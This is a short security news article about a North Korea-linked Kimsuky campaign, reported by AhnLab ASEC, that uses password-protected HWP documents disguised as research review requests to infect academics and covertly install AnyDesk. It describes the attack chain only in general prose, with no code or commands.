A newly uncovered malware campaign by North Korea-linked threat group Kimsuky is targeting academic institutions using a sophisticated blend of social engineering and technical stealth. The campaign leverages password-protected Hangul Word Processor (HWP) documents disguised as research review requests to deliver malware and establish persistent access to compromised systems.

The campaign was identified by South Korea’s AhnLab Security Emergency Response Center (ASEC), which described it as a “highly coordinated operation exploiting the academic community’s trust-based communication.” The phishing emails appear to come from real professors or institutions and often include documents tied to sensitive topics like the Russo-Ukrainian war.

“This campaign stands out for its clever use of legitimate academic practices to bypass conventional security filters,” said an ASEC analyst in their June 14 report. “Password-protected documents naturally appear more trustworthy and are harder for scanners to analyze.”

Once opened with the provided password, the infected HWP files trigger embedded malicious OLE objects, which unpack six components, including reconnaissance scripts and a bait document to maintain user trust. A hidden hyperlink labeled “More…” launches a chain of operations to delete evidence, install scheduled tasks for persistence, and secretly download the legitimate remote access tool AnyDesk.

“The attackers went so far as to configure AnyDesk to be invisible to end-users,” noted ASEC. “This level of stealth shows their intent to remain in these networks long-term.”

The campaign’s implications are far-reaching. As academic networks often connect with government agencies and private research partners, successful infiltrations could lead to widespread data leaks and espionage.

Google’s Threat Analysis Group has also flagged the Kimsuky group as “a persistent and well-resourced APT targeting geopolitically sensitive sectors,” reinforcing the urgency of this threat.